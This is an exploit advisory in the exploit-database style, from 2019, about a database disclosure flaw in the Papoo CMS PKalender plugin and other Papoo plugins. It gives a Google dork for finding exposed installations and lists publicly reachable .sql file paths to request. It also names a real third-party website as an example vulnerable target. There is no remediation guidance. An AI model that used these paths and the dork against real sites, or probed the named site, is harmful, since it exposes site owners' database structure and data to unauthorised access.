Papoo CMS PKalender Plugins 3.5 Database Disclosure

1. ####################################################################
2.  
3. # Exploit Title : Papoo CMS PKalender Plugins 3.5 Database Disclosure
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 28/01/2019
7. # Vendor Homepage : papoo.de
8. # Software Download Links :
9. + papoo.de/index.php?menuid=169&downloadid=352&reporeid=349
10. + papoo.de/free-cms-kostenloser-download.html
11. + papoo.de/6-papoo-pro-downloadversion.html
12. + papoo.de/18-papoo-business-version-downloadversion.html
13. + papoo.de/147-papoo-enterprise-cms.html
14. # Software Information Link : papoo.de/f-2-12-153-kalender-plugin.html
15. # Software Version : 3.5 and 4
16. # Software Price : Priceless and Priced [ 99 Euro - 379 Euro - 699 Euro ]
17. # Tested On : Windows and Linux
18. # Category : WebApps
19. # Exploit Risk : Medium
20. # Google Dorks : inurl:/plugins/pkalender/sql/
21. # Vulnerability Type : CWE-200 [ Information Exposure ]
22.  
23. ####################################################################
24.  
25. # Impact :
26. **********
27.  
28. Papoo CMS PKalender Plugins 3.5 has database disclosure vulnerability because,
29.  
30. information exposure is the intentional or unintentional disclosure of
31.  
32. information to an actor that is not explicitly authorized to have access to that information.
33.  
34. ####################################################################
35.  
36. # Database Disclosure Exploit :
37. ***************************
38.  
39. /plugins/pkalender/sql/pkalender_deinstall.sql
40.  
41. /plugins/pkalender/sql/pkalender_install.sql
42.  
43. /plugins/pkalender/sql/update.sql
44.  
45. # Other Plugins Database Disclosure Exploit =>
46. *****************************************
47.  
48. /plugins/fb_plugin/sql/fb_plugin_deinstall.sql
49.  
50. /plugins/fb_plugin/sql/fb_plugin_install.sql
51.  
52. /plugins/fb_plugin/sql/update.sql
53.  
54. /plugins/fb_plugin/sql/update.sql
55.  
56. /plugins/freiemodule/sql/freiemoduleplugin_install.sql
57.  
58. /plugins/galerie/sql/galerie_deinstall.sql
59.  
60. /plugins/galerie/sql/galerie_install.sql
61.  
62. /plugins/lagsh/sql/lagsh_deinstall.sql
63.  
64. /plugins/lagsh/sql/lagsh_install.sql
65.  
66. /plugins/lagsh_termine/sql/lagsh_termine_deinstall.sql
67.  
68. /plugins/lagsh_termine/sql/lagsh_termine_install.sql
69.  
70. /plugins/newsletter_lagsh/sql/newsletter_lagsh_deinstall.sql
71.  
72. /plugins/newsletter_lagsh/sql/newsletter_lagsh_install.sql
73.  
74. /plugins/projekte/sql/projekt_deinstall.sql
75.  
76. /plugins/projekte/sql/projekt_install.sql
77.  
78. /plugins/rssfeed/sql/test_deinstall.sql
79.  
80. /plugins/rssfeed/sql/test_install.sql
81.  
82. /plugins/selbsthilfe/sql/selbsthilfe_deinstall.sql
83.  
84. /plugins/selbsthilfe/sql/selbsthilfe_install.sql
85.  
86. /plugins/social_media_buttons/sql/social_media_buttons_deinstall.sql
87.  
88. /plugins/social_media_buttons/sql/social_media_buttons_install.sql
89.  
90. /plugins/sprechomat/sql/sprechomat_deinstall.sql
91.  
92. /plugins/sprechomat/sql/sprechomat_install.sql
93.  
94. /plugins/umfrage/sql/umfrage_delete.sql
95.  
96. /plugins/umfrage/sql/umfrage_install.sql
97.  
98. ###################################################################
99.  
100. # Example Vulnerable Site :
101. *************************
102.  
103. [+] selbsthilfenetzwerk-sachsen.de/plugins/pkalender/sql/pkalender_install.sql
104.  
105. ####################################################################
106.  
107. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
108.  
109. ####################################################################